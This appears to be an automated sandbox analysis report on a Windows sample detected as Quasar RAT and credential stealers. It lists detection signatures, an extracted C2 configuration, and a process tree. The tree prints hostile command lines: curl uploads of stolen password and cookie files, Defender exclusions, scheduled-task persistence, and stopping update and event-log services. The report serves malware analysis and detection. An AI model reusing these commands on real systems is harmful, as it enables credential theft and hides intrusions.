Edit tour
Windows
Analysis Report
w85VkFOxiD.exe
Overview
General Information
| Sample name: | w85VkFOxiD.exerenamed because original name is a hash value |
| Original sample name: | 4BB4FF4B1FA6C7E122557D8A55826242.exe |
| Analysis ID: | 1440251 |
| MD5: | 4bb4ff4b1fa6c7e122557d8a55826242 |
| SHA1: | 241427d58cc7787fd24536821080244f344ddc74 |
| SHA256: | a45c739b9f551d8633053381950f20a617ae2fe9c1d96d4f433d8ffa3015fb5e |
| Tags: | exeQuasarRATRAT |
| Infos: |   |
 | |
Detection
Python Stealer, CStealer, NiceRAT, Quasar
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Schedule system process
Sigma detected: Stop EventLog
Snort IDS alert for network traffic
Yara detected CStealer
Yara detected NiceRAT
Yara detected Quasar RAT
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Drops PE files to the startup folder
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal communication platform credentials (via file / registry access)
Uses dynamic DNS services
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
Yara detected Generic Python Stealer
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (STR)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
w85VkFOxiD.exe (PID: 5804 cmdline: "C:\Users\ user\Deskt op\w85VkFO xiD.exe" MD5: 4BB4FF4B1FA6C7E122557D8A55826242) 
powershell.exe (PID: 3336 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -EncodedCo mmand "PAA jAGwAawBsA CMAPgBBAGQ AZAAtAE0Ac ABQAHIAZQB mAGUAcgBlA G4AYwBlACA APAAjAGgAa QBzACMAPgA gAC0ARQB4A GMAbAB1AHM AaQBvAG4AU ABhAHQAaAA gAEAAKAAkA GUAbgB2ADo AVQBzAGUAc gBQAHIAbwB mAGkAbABlA CwAJABlAG4 AdgA6AFMAe QBzAHQAZQB tAEQAcgBpA HYAZQApACA APAAjAGQAc gB2ACMAPgA gAC0ARgBvA HIAYwBlACA APAAjAGMAd gBwACMAPgA =" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
conhost.exe (PID: 6456 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
R3nzSkin_Injector.exe (PID: 2664 cmdline: "C:\Users\ user\AppDa ta\Local\T emp\R3nzSk in_Injecto r.exe" MD5: 8AF17734385F55DC58F1CA38BCE22312) - Conhost.exe (PID: 8020 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Update.exe (PID: 7180 cmdline:
"C:\Users\ user\AppDa ta\Roaming \Update.ex e" MD5: F91699F2FF3F446461A302EA2D69BE44) - schtasks.exe (PID: 7348 cmdline:
"schtasks" /create / tn "Update " /sc ONLO GON /tr "C :\Users\us er\AppData \Roaming\A pplication FrameHost\ RuntimeBro ker.exe" / rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2) - conhost.exe (PID: 7368 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - RuntimeBroker.exe (PID: 7428 cmdline:
"C:\Users\ user\AppDa ta\Roaming \Applicati onFrameHos t\RuntimeB roker.exe" MD5: F91699F2FF3F446461A302EA2D69BE44) - schtasks.exe (PID: 7492 cmdline:
"schtasks" /create / tn "Update " /sc ONLO GON /tr "C :\Users\us er\AppData \Roaming\A pplication FrameHost\ RuntimeBro ker.exe" / rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2) - conhost.exe (PID: 7500 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
SearchServices.exe (PID: 7240 cmdline: "C:\Users\ user\AppDa ta\Roaming \SearchSer vices.exe" MD5: E35564F0BAD6C37132DC4157519F52E3) - SearchServices.exe (PID: 7556 cmdline:
"C:\Users\ user\AppDa ta\Roaming \SearchSer vices.exe" MD5: E35564F0BAD6C37132DC4157519F52E3) - cmd.exe (PID: 7676 cmdline:
C:\Windows \system32\ cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7692 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7760 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7776 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 7812 cmdline:
tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 6668 cmdline:
C:\Windows \system32\ cmd.exe /c "curl -F "file=@C:\ Users\user \AppData\L ocal\Temp\ crpassword s.txt" htt ps://store 4.gofile.i o/uploadFi le" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2056 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 5804 cmdline:
curl -F "f ile=@C:\Us ers\user\A ppData\Loc al\Temp\cr passwords. txt" https ://store4. gofile.io/ uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - cmd.exe (PID: 6528 cmdline:
C:\Windows \system32\ cmd.exe /c "curl -F "file=@C:\ Users\user \AppData\L ocal\Temp\ crcookies. txt" https ://store4. gofile.io/ uploadFile " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7524 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 7412 cmdline:
curl -F "f ile=@C:\Us ers\user\A ppData\Loc al\Temp\cr cookies.tx t" https:/ /store4.go file.io/up loadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - Conhost.exe (PID: 7640 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - SecurityHealthServices.exe (PID: 7296 cmdline:
"C:\Users\ user\AppDa ta\Local\S ecurityHea lthService s.exe" MD5: 5143FE6D0C9218C03877131E7FF8F195) - powershell.exe (PID: 7584 cmdline:
C:\Windows \system32\ WindowsPow erShell\v1 .0\powersh ell.exe Ad d-MpPrefer ence -Excl usionPath @($env:Use rProfile, $env:Progr amData) -E xclusionEx tension '. exe' -Forc e MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7592 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7872 cmdline:
C:\Windows \system32\ cmd.exe /c wusa /uni nstall /kb :890830 /q uiet /nore start MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7888 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
wusa.exe (PID: 7936 cmdline: wusa /unin stall /kb: 890830 /qu iet /nores tart MD5: FBDA2B8987895780375FE0E6254F6198) - sc.exe (PID: 7880 cmdline:
C:\Windows \system32\ sc.exe sto p UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 7896 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 7992 cmdline:
C:\Windows \system32\ sc.exe sto p WaaSMedi cSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 8000 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 8032 cmdline:
C:\Windows \system32\ sc.exe sto p wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 8040 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 8080 cmdline:
C:\Windows \system32\ sc.exe sto p bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 8088 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 8144 cmdline:
C:\Windows \system32\ sc.exe sto p dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 8152 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powercfg.exe (PID: 2004 cmdline:
C:\Windows \system32\ powercfg.e xe /x -hib ernate-tim eout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - conhost.exe (PID: 2488 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powercfg.exe (PID: 5480 cmdline:
C:\Windows \system32\ powercfg.e xe /x -hib ernate-tim eout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - conhost.exe (PID: 7352 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powercfg.exe (PID: 7372 cmdline:
C:\Windows \system32\ powercfg.e xe /x -sta ndby-timeo ut-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - conhost.exe (PID: 7388 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powercfg.exe (PID: 7392 cmdline:
C:\Windows \system32\ powercfg.e xe /x -sta ndby-timeo ut-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - conhost.exe (PID: 6888 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
dialer.exe (PID: 7008 cmdline: C:\Windows \system32\ dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93) 
winlogon.exe (PID: 552 cmdline: winlogon.e xe MD5: F8B41A1B3E569E7E6F990567F21DCE97) - lsass.exe (PID: 628 cmdline:
C:\Windows \system32\ lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A) - svchost.exe (PID: 920 cmdline:
C:\Windows \system32\ svchost.ex e -k DcomL aunch -p - s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - dwm.exe (PID: 988 cmdline:
"dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C) - svchost.exe (PID: 364 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s g psvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 356 cmdline:
C:\Windows \System32\ svchost.ex e -k Local ServiceNet workRestri cted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 696 cmdline:
C:\Windows \System32\ svchost.ex e -k Local SystemNetw orkRestric ted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 592 cmdline:
C:\Windows \system32\ svchost.ex e -k Local ServiceNet workRestri cted -p -s TimeBroke rSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1044 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s S chedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - Conhost.exe (PID: 7600 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Conhost.exe (PID: 2088 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Conhost.exe (PID: 6888 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Conhost.exe (PID: 7720 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Conhost.exe (PID: 3760 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Conhost.exe (PID: 7456 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Conhost.exe (PID: 4544 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 7536 cmdline:
C:\Windows \system32\ sc.exe del ete "KPAAD CYR" MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 7492 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 2896 cmdline:
C:\Windows \system32\ sc.exe cre ate "KPAAD CYR" binpa th= "C:\Pr ogramData\ xskudridkt fu\vmarkgh gnurz.exe" start= "a uto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 5572 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 7712 cmdline:
C:\Windows \system32\ sc.exe sto p eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 7720 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 7692 cmdline:
C:\Windows \system32\ sc.exe sta rt "KPAADC YR" MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 3872 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- vmarkghgnurz.exe (PID: 4428 cmdline:
C:\Program Data\xskud ridktfu\vm arkghgnurz .exe MD5: 5143FE6D0C9218C03877131E7FF8F195)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| DynamicStealer | Dynamic Stealer is a Github Project C# written code by L1ghtN4n. This code collects passwords and uploads these to Telegram. According to Cyble this Eternity Stealer leverages code from this project and also Jester Stealer could be rebranded from it. | No Attribution |
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Quasar RAT, QuasarRAT | Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult. |
{"Version": "1.4.1", "Host:Port": "bardu3662.duckdns.org:9733;", "SubDirectory": "ApplicationFrameHost", "InstallName": "RuntimeBroker.exe", "MutexName": "afa58199-2aae-4e08-8ef4-8e4ef39bc0aa", "StartupKey": "Update", "Tag": "Webhook", "LogDirectoryName": "Logs", "ServerSignature": "Q5N6/g9zFmxO1ScIoox3GiHa7JufFfLHKzumiV48m4+IZh/dhTG2RPevl5g2ETZSzFVErZ+quTEUAE+wxgqsMlH94VbyRf6QfSwMTzH0h86nD0UYfKTboIQiHb85oNid5seJILzBJiQ23tSDQHJffHYY8/pAFvkm3UmzN3YhcBVVq68UR3SdZ/ucI8Uk3riwaxUijxb0RwXJYsv5XsPwdCuLRH8VJH/3UQ5XAa05QeHKEFoVf+l6NCsxXv2CqsacdPX6E00JNbJRCw2Lncn4eyjYxsetdBNVUuWEXXdickbs6CsZQAEnaM9oie46IScSzgkq+AO/acun1gmfg4mF0kJy6hy/XPQF/JPhDGwJlpNWeOOJIR5vmck3tgJFWRuc+SjUOO6NFifMPl/qVSz8kY2u5DOoLegg5E+yilzTs1tZzZlRIoiZSR+qDI78VqLp132K9mZYE7hY1od+mn3ESj/5NFbycx/aebkvg7cmGGmJwrFfXlzn9aNrmmdLkEDRqNLfbDjoFYeX5PrI3WYaG2sWHHu2/WKPLczXCSvHPFvHIE0GCLS62DqnhgvEEx0uR+x9sJk0kxJBxRNIjK4JUssVX189xfFhWGIkHZgYxvrLqxPIJhXHRaFKddrjn2zdkemc1mLrGuCVc3trvZLfbErBrrJRZdv5Fw8EraN1kxU=", "ServerCertificate": "MIIE9DCCAtygAwIBAgIQAPuDEcknjDYT2HqBiX26qTANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTI0MDQyOTIxMjQ1OVoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAgQ20vEo+N2+LTOwPnW1Wb0vf92dR+r7EH01r29qEXKYU1huZoYQu5+JgazqBN8rZ/xANqydFHODfD+TJhLJKiJMw/8VY84epokrOc+MPVpKok59utEmYotaR4YpyPVvU0apiaojAIUJ0mGyvfougGroLp90jEo1YgraLHqvdfj89tbPgqqt2qVdYLnwIsZT4sa/qcH2ZsYU1/3JCk4hd3Q4/Pyz3oRsUNzyMPoPLcFL73vqxdNCa44zL8qYunOZmQtYzqNX+rPmiFUw6rSUpXUAmMFowbvvw3D7fse8SMYAe3q2rO0AO8VdtH8HWDRD3KYVdGhrUxVjPO1yfYKz4ogsn6pNl0SwzoiyfOT10dOtxiNbz/Ks/hTnmVWL3w4LQrnKc9qcgNjDRihFZOlsy66g6XTQnb7VySvqCiV1Huq0YbDwK/LvnzhFuhFD0v6rMkXa36zV4jzcKJgGgN2bdxK+g7uvR5jNz+KWtiS9zK0gWxgZnllvBp09mdfgeLqp3njgntwjO2TqG7Ed+qHnMVi+QwJzF5e6eXWFg7qToI5EfDmAMyLA4ctd3gEZi4kFfRCes5lueqP4G1liiyEiw1OE4PqWTVC8mFVwNbOkPXhazUYRb7kUIsc1IiQ15Wb/Ro5Ku/5CdxFqw3ZpgCyyJJt88eUIasOsrl0QjqzLzWpcCAwEAAaMyMDAwHQYDVR0OBBYEFMPwzjGDS28XbbYbAZPlhz5Is8bHMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBAFcNuAqADUp7/FIBI24jlwN8dQAXr9YEOVFq8DaBEvzlFqZOx3dxCFJMXxWqkh0B9nNirCguc+7cCrQvJA6VTiUNqgEsyeIsdPgB3cx/T29Th5fCciOFXt4JcdynTKUBG9ebTbq+jTkuWTjjV9E8rRg4ArwBJnPb5paXYhJEEDgaUkejcKPyOBAYREzBS94eAw65gtV4pn796NZ1k01pz5Vjp5OJealPhFAVpjfoy6d8CiAZXkyGTm2hn3s4nBAx9U/cuckl3/NV3gbAeB97qcvXWrNJscJllGBxeiyp/PppT3BlaPWCgpI1i7EzBgfyvFDU/62vEPUzpLOqQFuXp1lqsgL3MQgjK9+dvGg5hr7gBgjf3l2lsvBJhaUNVQBzUTxDb8zUjfo7EPqJmsDcbHmbeuCU6eFlwicVVbr9x7QMLpc6al1Gdi525zy4lDdolBNzsl0qirQKwxeP7KGVTG7RtsVcYLo5R9rBmvdvV01gjGj43hSCAhtiLP8qy4WVl206qXpkrBSvroncxhDA0WWvUwP1II6WcZqPxHWh/kzd24Tl5UHYsTycAGAAUHPWxHOmryAGEAMbNX72ARlxnV9k8mIATWz402A4BbXzkID6BjnLOUctzhOv/SM+KDw+4gjFLIN1COzRzSRjCfoTiFlz+hWHNuW+xczOFxLhAnjT"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security | ||
| JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
| MAL_QuasarRAT_May19_1 | Detects QuasarRAT malware | Florian Roth |
| |
| INDICATOR_SUSPICIOUS_GENInfoStealer | Detects executables containing common artifcats observed in infostealers | ditekSHen |
| |
| MALWARE_Win_QuasarStealer | Detects Quasar infostealer | ditekshen |
| |
| Click to see the 5 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security | ||
| JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security | ||
| JoeSecurity_GenericPythonStealer | Yara detected Generic Python Stealer | Joe Security | ||
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_NiceRAT | Yara detected NiceRAT | Joe Security | ||
| Click to see the 5 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security | ||
| JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
| MAL_QuasarRAT_May19_1 | Detects QuasarRAT malware | Florian Roth |
| |
| INDICATOR_SUSPICIOUS_GENInfoStealer | Detects executables containing common artifcats observed in infostealers | ditekSHen |
| |
| MALWARE_Win_QuasarStealer | Detects Quasar infostealer | ditekshen |
|
Change of critical system settings |   |
|---|
| Source: | Author: Joe Security: | ||
System Summary | |
|---|
| Source: | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: frack113: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: | ||
| Source: | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||
Persistence and Installation Behavior | |
|---|
| Source: | Author: Joe Security: | ||
HIPS / PFW / Operating System Protection Evasion | |
|---|
| Source: | Author: Joe Security: | ||
| Timestamp: | 05/12/24-23:37:07.083444 |
| SID: | 2035595 |
| Source Port: | 9733 |
| Destination Port: | 49731 |
| Protocol: | TCP |
| Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | Avira: | ||
| Source: | URL Reputation: | ||
| Source: | URL Reputation: | ||
| Source: | Malware Configuration Extractor: | ||